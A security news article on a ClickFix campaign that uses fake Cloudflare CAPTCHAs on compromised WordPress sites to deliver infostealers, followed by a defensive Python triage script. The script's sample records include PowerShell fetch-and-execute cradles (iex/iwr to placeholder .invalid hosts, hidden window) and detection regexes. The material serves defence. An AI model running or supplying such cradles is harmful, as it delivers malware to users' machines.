Overview of the attack chain | Image: Rapid7
In a sophisticated new campaign active since late 2025, a mysterious threat actor has been turning the internet's most basic security tool, the human verification challenge, into a gateway for high-stakes financial theft. Rapid7 Labs recently unmasked a widespread operation that compromises legitimate WordPress websites to inject a “ClickFix” implant. This implant impersonates a Cloudflare CAPTCHA to trick users into executing a multi-stage malware chain that ultimately drains digital wallets and steals sensitive credentials.
Researchers have identified more than 250 infected websites spanning at least 12 countries, including the US, UK, Australia, and India. The targets are alarming in their legitimacy, ranging from local business sites and regional news outlets to the official webpage of a United States Senate candidate.
As the report notes:
“This legitimacy, together with the convincing appearance of the fake Cloudflare CAPTCHA lure, makes this threat dangerous for organizations and individuals alike”.
The attack begins when a visitor lands on a compromised WordPress site. The site injects a script that only triggers if the user is not logged into the WordPress admin panel, a clever tactic designed to hide the infection from site owners.
- A fake Cloudflare “Verify you are human” box appears.
- To “verify,” users are instructed to press Win + R, paste a command, and hit enter.
- This command triggers a PowerShell script that retrieves the “DoubleDonut” loader, a two-stage shellcode engine that operates almost entirely in system memory to evade traditional antivirus software.
The “DoubleDonut” loader acts as a delivery vehicle for various infostealers, which the threat actor has rotated throughout the campaign:
- Vidar Stealer v2: An evolved version of a notorious stealer that now uses encrypted C2 configurations and a “Vigenère-like” decryption routine to hide its tracks.
- Impure Stealer: A custom .NET malware that uses a server-provided key for AES-256-CBC encryption of its communications, masquerading as members of the PureLogs family.
- VodkaStealer: A new, custom C++ stealer believed to be unique to this campaign. While it lacks the polish of commercial stealers, it employs a “helper binary” known as ChromElevator to bypass Chrome's latest app-bound encryption.
The shift to a custom tool like VodkaStealer suggests an interesting evolution in the cybercrime economy. Rapid7 researchers speculate that while commercial stealers are expensive, the rise of pre-trained LLMs may be making it easier for attackers to develop their own “proof of concept” malware from scratch.
Despite this technical complexity, the malware maintains a classic “no-go zone”: it terminates immediately if it detects a Russian keyboard layout or an IP address located in Russia or Belarus.
Traditional file-based detection is largely ineffective here because the malware chain is “executed almost entirely in memory and in the context of inconspicuous Windows processes”.
Defenders are urged to:
- Audit WordPress Sites: Ensure no unknown scripts are running via admin-ajax.php.
- Monitor PowerShell: Watch for suspicious outbound Invoke-Expression or Invoke-WebRequest commands.
- Verify CAPTCHAs: Real verification challenges will never ask you to copy and paste commands into your Windows Run dialog.
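The PowerShell monitoring advice above can be turned into a small triage rule. The following Python script is an added example written for this article, not code from Rapid7 or from the campaign; it runs over hand-constructed records that mimic two Windows event types (4104 script-block text and 4688 process creation). The field names (`host`, `user`, `script`, `image`, `parent`, `cmdline`) are assumptions for the example, not a real log schema, and the URLs use the reserved `.invalid` domain. It scores a download cradle combined with Invoke-Expression as high, and separately flags PowerShell spawned by explorer.exe, which is what the Win+R Run dialog produces when a user pastes the lure command.

```python
"""Triage of constructed PowerShell telemetry for ClickFix-style activity.

Added example, not Rapid7's code. The records below are hand-written and
only mimic Windows event fields; they are not real telemetry.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicator groups. Case-insensitive; aliases (iwr, irm, iex) are included
# because the lure commands are typically abbreviated to fit a paste box.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
    r"downloadstring|downloadfile|net\.webclient", re.I)
EXEC_RE = re.compile(r"invoke-expression|\biex\b", re.I)
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:c|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|"
    r"-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I)


@dataclass
class Finding:
    host: str
    user: str
    severity: str
    reasons: List[str] = field(default_factory=list)


def score_script_block(host: str, user: str, script: str) -> Optional[Finding]:
    """Score one 4104 script-block record; None means nothing notable."""
    reasons = []
    if DOWNLOAD_RE.search(script):
        reasons.append("download cradle")
    if EXEC_RE.search(script):
        reasons.append("invoke-expression")
    if EVASION_RE.search(script):
        reasons.append("evasion flags")
    if not reasons:
        return None
    # Fetch-and-execute in one block is the in-memory loader pattern itself.
    if "download cradle" in reasons and "invoke-expression" in reasons:
        severity = "high"
    elif len(reasons) >= 2:
        severity = "medium"
    else:
        severity = "low"
    return Finding(host, user, severity, reasons)


def score_process_creation(host: str, user: str, image: str, parent: str,
                           cmdline: str) -> Optional[Finding]:
    """Score one 4688 record. The Run dialog launches children from
    explorer.exe, so explorer-spawned PowerShell carrying a download or a
    hidden-window flag is the process-level signature of the lure."""
    img = image.lower().rsplit("\\", 1)[-1]
    par = parent.lower().rsplit("\\", 1)[-1]
    if img not in ("powershell.exe", "pwsh.exe"):
        return None
    reasons = []
    if par == "explorer.exe":
        reasons.append("spawned by explorer.exe (Run dialog)")
    if DOWNLOAD_RE.search(cmdline) or EXEC_RE.search(cmdline):
        reasons.append("download/exec on command line")
    if EVASION_RE.search(cmdline):
        reasons.append("evasion flags")
    if not reasons:
        return None
    severity = {3: "high", 2: "medium"}.get(len(reasons), "low")
    return Finding(host, user, severity, reasons)


def triage(events) -> List[Finding]:
    """Dispatch each constructed record to the scorer for its event id."""
    findings = []
    for ev in events:
        if ev["id"] == 4104:
            f = score_script_block(ev["host"], ev["user"], ev["script"])
        elif ev["id"] == 4688:
            f = score_process_creation(ev["host"], ev["user"], ev["image"],
                                       ev["parent"], ev["cmdline"])
        else:
            f = None
        if f is not None:
            findings.append(f)
    return findings


# Constructed sample records (assumed schema, placeholder .invalid hosts).
SAMPLE_EVENTS = [
    {"id": 4104, "host": "WS-01", "user": "alice",
     "script": r"Get-ChildItem C:\Users\alice\Documents | Measure-Object"},
    {"id": 4104, "host": "WS-02", "user": "bob",
     "script": r"Invoke-WebRequest -Uri https://updates.example.invalid/agent.msi -OutFile C:\Temp\agent.msi"},
    {"id": 4104, "host": "WS-03", "user": "carol",
     "script": "iex (iwr -UseBasicParsing http://verify-captcha.example.invalid/c)"},
    {"id": 4688, "host": "WS-04", "user": "dave",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://bad.example.invalid/x)"'},
    {"id": 4688, "host": "WS-05", "user": "svc-backup",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.host} {f.user}: {', '.join(f.reasons)}")
```

Of the five constructed records, the plain directory listing produces nothing, the administrator's `Invoke-WebRequest` download and the scheduled `-NoProfile` task score low (single indicators that are routine on their own), and the two fetch-and-execute cases score high. That split is the point of the rule: a download cradle or a hidden window by itself is noise, the combination is the loader, and an explorer.exe parent is the tell that a human pasted it into the Run dialog.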